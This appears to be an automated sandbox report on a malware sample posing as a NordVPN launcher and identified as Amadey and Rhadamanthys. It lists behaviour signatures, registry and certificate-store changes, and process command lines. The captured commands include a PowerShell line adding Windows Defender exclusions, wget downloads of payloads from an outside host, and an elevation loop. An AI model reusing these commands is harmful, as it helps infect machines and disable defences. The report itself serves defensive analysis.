Analysis Overview
SHA256
fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
Threat Level: Known bad
The file Launcher.exe was found to be: Known bad.
Malicious Activity Summary
Amadey
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Legitimate hosting services abused for malware hosting/C2
Checks computer location settings
Executes dropped EXE
Enumerates physical storage devices
Program crash
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-29 14:54
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-29 14:54
Reported
2024-03-29 15:01
Platform
win10v2004-20240226-en
Max time kernel
233s
Max time network
275s
Command Line
Signatures
Amadey
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3700 created 2768 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin16904 | C:\Windows\system32\sihost.exe |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin16904 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\NordVPN-10_11.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin16904 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin16904 | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.0.1356778034\781898511" -parentBuildID 20221007134813 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bac3c253-492e-4754-8824-332a5a2ce8c1} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 1980 1450b8f6a58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.1.824453598\2145723619" -parentBuildID 20221007134813 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {acaa10f2-4a25-4541-ba6c-256fe5ca92f9} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2380 1450b7f5458 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.2.353070175\1465853438" -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3400 -prefsLen 20823 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {438e99c7-e7df-4dcd-88d1-7e7cf4d178fd} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3120 1450f9bdc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.3.1668280839\1170008933" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec4c2570-f71b-4ea2-86f9-0942de763845} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3588 1450e3ad558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.4.1512091846\1798937739" -childID 3 -isForBrowser -prefsHandle 4544 -prefMapHandle 4540 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e44030b0-6a2d-4728-a678-f6897fe0e0cc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 4552 145115a2f58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.5.1946169069\286040142" -childID 4 -isForBrowser -prefsHandle 5000 -prefMapHandle 4996 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48b1b25d-d050-42b7-9d6c-a24b299f21bc} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5008 14511f09c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.6.500169602\1990768902" -childID 5 -isForBrowser -prefsHandle 4936 -prefMapHandle 4932 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e902716-9475-45c0-996a-fa79f2f68a0a} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5032 14511f0c258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.7.1205998962\1432607393" -childID 6 -isForBrowser -prefsHandle 5288 -prefMapHandle 5164 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e73a16d0-cffd-455e-a9e9-294ea1e798fb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5276 14511f0d758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.8.559184309\1915907281" -childID 7 -isForBrowser -prefsHandle 5848 -prefMapHandle 5844 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5967c015-3b37-48fe-831f-3d6948a42493} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5860 145139ab558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.9.1771782841\217158023" -childID 8 -isForBrowser -prefsHandle 5056 -prefMapHandle 5108 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {829adee5-4281-4ef9-a610-03061e01936e} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 5048 14512447b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.10.1618326309\413425509" -parentBuildID 20221007134813 -prefsHandle 4844 -prefMapHandle 4272 -prefsLen 26725 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a284c35b-bbc6-45d5-89c3-7d15b45bcfbb} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2796 1450e05da58 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.11.318254061\19738600" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 3236 -prefMapHandle 3164 -prefsLen 26725 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fbb6aa6-4d30-414c-b886-0b96befe9b38} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2864 1450f2f7558 utility
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap27144:88:7zEvent917
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe
"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin16904
C:\Users\Admin\AppData\Roaming\services\plugin16904
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3700 -ip 3700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 628
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6622:88:7zEvent8870
C:\Users\Admin\AppData\Roaming\services\winrar.exe
